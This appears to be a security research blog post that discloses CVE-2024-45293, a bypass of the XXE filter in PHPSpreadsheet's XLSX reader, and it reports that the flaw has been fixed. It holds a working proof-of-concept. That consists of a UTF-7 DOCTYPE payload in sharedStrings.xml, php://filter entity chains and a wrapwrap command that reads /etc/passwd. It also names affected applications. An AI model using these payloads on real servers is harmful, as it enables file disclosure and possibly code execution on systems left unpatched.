logo Menu
Home > Research

CVE-2024-45293: XXE in PHPSpreadsheet's Excel parser

25 October 2024

The PHPSpreadSheet library, part of the widely used PHPOffice open-source suite, was discovered to be vulnerable to XML External Entity (XXE) Injection. This vulnerability arises from improperly defined XXE sanitization filters within the XLSX reader, allowing for the parsing of user-supplied Excel spreadsheets.

Exploitation involves supplying a crafted Excel spreadsheet (XLSX) with an embedded XML file containing a payload. When processed, this payload can reveal sensitive files on servers running applications that depend on this library.

Although a fix for a similar XXE vulnerability was introduced in version 2.2.1, it was not sufficiently robust. This blog presents a bypass for the existing patch and explores the associated impacts.

Affected Versions include:

Since PHPSpreadsheet is the successor for the now unmaintained PHPExcel and is widely adopted, This vulnerability affects a range of applications that are utilizing one of the core features of the library.

The Shaheen research team reported the security vulnerability in August, which was later fixed and assigned CVE-2024-45293 in September 13th, 2024.

Background

For this analysis, we used a simple PHP script that leverages the PHPSpreadsheet library to load a file under our control. The file in question is an Excel spreadsheet in XLSX format, which contains our Proof-of-Concept payload.

The workflow follows standard practices for using phpspreadsheet, first, the file is passed to IOFactory‘s load method, followed by retrieving the active sheet using getActiveSheet. Finally, the sheet’s content is read using the getRowIterator/getCellIterator methods.

The application script is as follows:

<?php

require __DIR__ . '/vendor/autoload.php';
use PhpOffice\PhpSpreadsheet\IOFactory;
use PhpOffice\PhpSpreadsheet\Worksheet\Worksheet;

class SpreadsheetReader {
	/**
	 * Reads the active worksheet from a spreadsheet file and returns its data.
	 *
	 * @param string $filePath Path to the spreadsheet file.
	 * @return array Data from the active worksheet including title and cells.
	 */
	public function readSpreadsheet(string $filePath): array {
		// Load the spreadsheet
		$spreadsheet = IOFactory::load($filePath);

		// Get the active sheet
		$worksheet = $spreadsheet->getActiveSheet();
		return $this->readWorksheet($worksheet);
	}

	/**
	 * Extracts data from the provided worksheet.
	 *
	 * @param Worksheet $worksheet The worksheet to read.
	 * @return array Data from the worksheet including title and cells.
	 */
	public function readWorksheet(Worksheet $worksheet): array {
	  $cellData = [];

	  foreach ($worksheet->getRowIterator() as $row) {
		  $cellIterator = $row->getCellIterator();
		  $cellIterator->setIterateOnlyExistingCells(true);

		  foreach ($cellIterator as $cell) {
			  $cellData[] = [
				  "Row" => $cell->getRow(),
				  "Column" => $cell->getColumn(),
				  "Value" => $cell->getValue(),
			  ];
			  print_r($cell->getValue());
		  }
	  }
	  return $cellData;
	}

}

// Example usage
$reader = new SpreadsheetReader();
$filePath = './poc.xlsx';
$data = $reader->readSpreadsheet($filePath);

print_r($data);

The application initializes the library by instantiating the SpreadsheetReader class, and then calls the read function on a file that we provide.

Parsing Excel (XLSX) sheets

public function readSpreadsheet(string $filePath): array {
	// Load the spreadsheet
	$spreadsheet = IOFactory::load($filePath);

	// Get the active sheet
	$worksheet = $spreadsheet->getActiveSheet();
	return $this->readWorksheet($worksheet);
}

The SpreadsheetReader relies on the IOFactory class from the library to load an appropriate reader based on the file extension provided.

This is done through the createReaderForFile function in IOReader,

If the user provides a file with a supported extension (such as XLSX), a reader for that specific format is instantiated and subsequently used to load the file via the reader’s load function.

The Details

The loader that handles Excel spreadsheets (XLSX) files is the loadSpreadsheetFromFile, which is in Reader\XLSX class.

Since Excel files are essentially just zip files containing XML and REL files, the function contains multiple references to loadZip function which it uses to parse the different files within the spreadsheet.

/**
* Loads Spreadsheet from file.
*/
protected function loadSpreadsheetFromFile(string $filename): Spreadsheet
{
	File::assertFile($filename, self::INITIAL_FILE);

	// Initialisations
	$excel = new Spreadsheet();
	$excel->removeSheetByIndex(0);
	$addingFirstCellStyleXf = true;
	$addingFirstCellXf = true;

	$unparsedLoadedData = [];

	$this->zip = $zip = new ZipArchive();
	$zip->open($filename);

	//	Read the theme first, because we need the colour scheme when reading the styles
	[$workbookBasename, $xmlNamespaceBase] = $this->getWorkbookBaseName();
	$drawingNS = self::REL_TO_DRAWING[$xmlNamespaceBase] ?? Namespaces::DRAWINGML;
	$chartNS = self::REL_TO_CHART[$xmlNamespaceBase] ?? Namespaces::CHART;
	$wbRels = $this->loadZip("xl/_rels/{$workbookBasename}.rels", Namespaces::RELATIONSHIPS);
	...
	...
	$rels = $this->loadZip(self::INITIAL_FILE, Namespaces::RELATIONSHIPS);
	...
	...

The loadZip function will go through the XML files within the uploaded spreadsheet, parse them using simplexml_load_string, and then return them as SimpleXMLElement, as seen in the definition below.


private function loadZip(string $filename, string $ns = '', bool $replaceUnclosedBr = false): SimpleXMLElement
	{
		$contents = $this->getFromZipArchive($this->zip, $filename);
		if ($replaceUnclosedBr) {
			$contents = str_replace('<br>', '<br/>', $contents);
		}
		$rels = simplexml_load_string(
			$this->getSecurityScannerOrThrow()->scan($contents),
			'SimpleXMLElement',
			Settings::getLibXmlLoaderOptions(),
			$ns
		);

		return self::testSimpleXml($rels);
	}

Before parsing the contents of the file, the function does pass them to the scan function in order to validate the content of the files, acting as a prevention measure for external XML entities (XXE) injection using the following approach on XLSX files in particular:

This can be seen in the code snippet below highlighting the scan function:

	public function scan($xml): string
	{
		$xml = "$xml";
		$xml = $this->toUtf8($xml);

		// Don't rely purely on libxml_disable_entity_loader()
		$pattern = '/\\0?' . implode('\\0?', str_split($this->pattern)) . '\\0?/';

		if (preg_match($pattern, $xml)) {
			throw new Reader\Exception('Detected use of ENTITY in XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
		}

		if ($this->callback !== null) {
			$xml = call_user_func($this->callback, $xml);
		}
		return $xml;
	}

The $this→pattern refers to the string <!DOCTYPE.

The vulnerability - Have some space

This blacklist approach is based on the assumption that the UTF-8 conversion works as needed before the resulting file is checked for the blacklisted strings.

Checking the toUTF8 function, the function searches for the encoding in the XML file through the findCharSet function.

private function toUtf8(string $xml): string
	{
		$charset = $this->findCharSet($xml);
		if ($charset !== 'UTF-8') {
			$xml = self::forceString(mb_convert_encoding($xml, 'UTF-8', $charset));

			$charset = $this->findCharSet($xml);
			if ($charset !== 'UTF-8') {
				throw new Reader\Exception('Suspicious Double-encoded XML, spreadsheet file load() aborted to prevent XXE/XEE attacks');
			}
		}

		return $xml;
	}

	private function findCharSet(string $xml): string
	{
		$patterns = [
			'/encoding="([^"]*]?)"/',
			"/encoding='([^']*?)'/",
		];

		foreach ($patterns as $pattern) {
			if (preg_match($pattern, $xml, $matches)) {
				return strtoupper($matches[1]);
			}
		}

		return 'UTF-8';
	}
<?xml version="1.0" encoding="UTF-8"?>

The findCharSet function which checks, using regex, for the encoding of the XML content provided, returns a default UTF-8 if the patterns provided are not found within the input XML.

If the encoding attribute was matched and it is not UTF-8, then the content is converted to UTF-8 as seen in the first if block of the toUtf8 function.

Herein lies the catch, this depends entirely on the fact that regex is a wide enough net that can catch all potential cases.

$patterns = [
			'/encoding="([^"]*]?)"/',
			"/encoding='([^']*?)'/",
		];

This pattern searches that scanned file for the pattern encoding="…" or encoding='…'; however, it doesn’t take into account that one can use whitespace in the property declarations, i.e. encoding ='UTF-7' (mainly intended for readability).

So an XML definition with the following:

<?xml version="1.0" encoding ='UTF-7'?>

Will not have its contents converted from UTF-7 to UTF-8. This is because it will be flagged as UTF-8 by the findCharSetfunction as the regex will fail to find the encoding and therefore default to UTF-8. This allows for the <!DOCTYPE string to be encoded with ease using UTF-7 encoding, bypassing the security filter, which searches ONLY for <!DOCTYPE, and thus enabling XXE Injection.

Excel shared strings

Since external entities in DTDs are not substituted by default, it does complicate the process of disclosing information through XXE.

As such we need a way to get the information we aim to disclose reflected back to us. On that note, Excel Spreadsheets utilize what is known as shared strings as a mechanism to save space and reduce redundancy when the file is saved on disk.

This technique inventories repeated strings in the sheet’s cells, ids them, and stores them in the sharedStrings.xml file. This allows it to put the id of the repeated string in its respective cells, ultimately saving space.

Now we say all that to indicate that the shared strings file is an XML file, and we can inject our XXE payload there and reflect the value we want back through the cells that contain said strings.

Disclosing the data - PHP filter wrapper & XML parameter entities

With the filter bypass discovered, we can inject XML entities and get them parsed.

The <!DOCTYPE filter can be bypassed by adding a space when defining the encoding, and using UTF-7 representation for < that is preceding the !DOCTYPE definition.

<?xml version="1.0" encoding= 'UTF-7' standalone="yes"?>
+ADw-!DOCTYPE abc [ ... ]>

However, as explained, there are some limitations that one has to work around. For example, external entities won’t resolve due to the missing NOENT flag for simpexml_load_string.

There is a slight trick that does work however, using a combination of the PHP filter wrapper and parameter entities, we can define custom entities and then call them within the XML; This does sound confusing, the example below hopefully should clear the idea.

echo "<\!ENTITY internal 'abc'  >" | base64
<?xml version="1.0" encoding= 'UTF-7' standalone="yes"?>
+ADw-!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "php://filter//resource=data://text/plain;base64,PCFFTlRJVFkgaW50ZXJuYWwgJ2FiYycgID4K" > %xxe;]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>&internal;</t></si></sst>

When this is run, we can see that the internal entity is created and its value abc is used as the value for the shared string.

The internal entity created and parsed

This can be escalated to read internal system files utilizing the same PHP filter wrappers!

PHP filters allows us to read any resource on the system, and even perform conversion/encodings (including adding prefixes and suffixes, the main source of complexity) on it before retrieval such as base64 encoding/decoding for example.

We can’t simply read the file and reflect its content directly, however, due to the flags on the simplexml_read_string function. We must get a little creative, as we have to create an entity with the file contents as its value so that we call the entity, we get its value. The end value for the xxe entity should be <!ENTITY _name_ 'RESOURCE CONTENTS'>.

This can be achieved by utilizing the PHP filter wrapper’s filter chains which are greatly described by Synacktiv on their blog, and by Charles Fol with the wrapwrap tool blog. They will be used to add a prefix of !<ENTITY _name_ ' and a suffix of '> to enclose the file contents in order to have a correct XML syntax.

To that end, the wrapwrap script was used to generate the proof-of-concept. It is worth noting that the payload is lengthy, and due to length constraints of the simplexml_load_string function, we can only have around ~50000 characters within the system literal. Relative to this, a payload to extract 54 characters is about ~35,000-50,000 bytes depending on the prefix and suffix.

Create the filter chain payload:

python wrapwrap/wrapwrap.py "/etc/passwd" "<\!ENTITY i '" "'>" 54

Sample chain:

php://filter/convert.base64-encode/convert.base64-encode/convert.iconv.855.UTF7/convert.base64-encode/convert.iconv.855.UTF7/conv....
...
...decode/dechunk/convert.base64-decode/convert.base64-decode/resource=/etc/passwd

Prepare the XXE payload:

<?xml version="1.0" encoding='UTF-7' standalone="yes"?>
+ADw-!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "PAYLOAD_GOES_HERE" > %xxe;]>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1" uniqueCount="1"><si><t>&ENTITY_NAME_GOES_HERE;</t></si></sst>

With the modified sharedStrings.xml file containing the payload parsed, a portion of the /etc/passwd file is disclosed signifying a successful XXE attempt.

disclosing the /etc/passwd file using the XXE

With research such as Charles Fol’s Iconv, set the charset to RCE, this increases the potential impacts of this XXE vulnerability from a simple disclosure to (potential) RCE.

Affected Apps

PHPSpreadsheet is used across many PHP projects, including Moodle and Kimai.

Kimai uses PHPSpreadsheet for importing and exporting invoices. This functionality in particular requires admin access to the platform. Once such access is obtained, the aforementioned vulnerability can be used to then upload a crafted XLSX invoice template to trigger the XXE.

This was reported to Kimai and was later fixed in version 2.21.0 alongside the PHPSpreadsheet patch.

Conclusion

Considering the level of adoption PHPSpreadsheet has, its important that applications and frameworks utilizing it patch up and update to the latest version.

Written By

Sultan Murad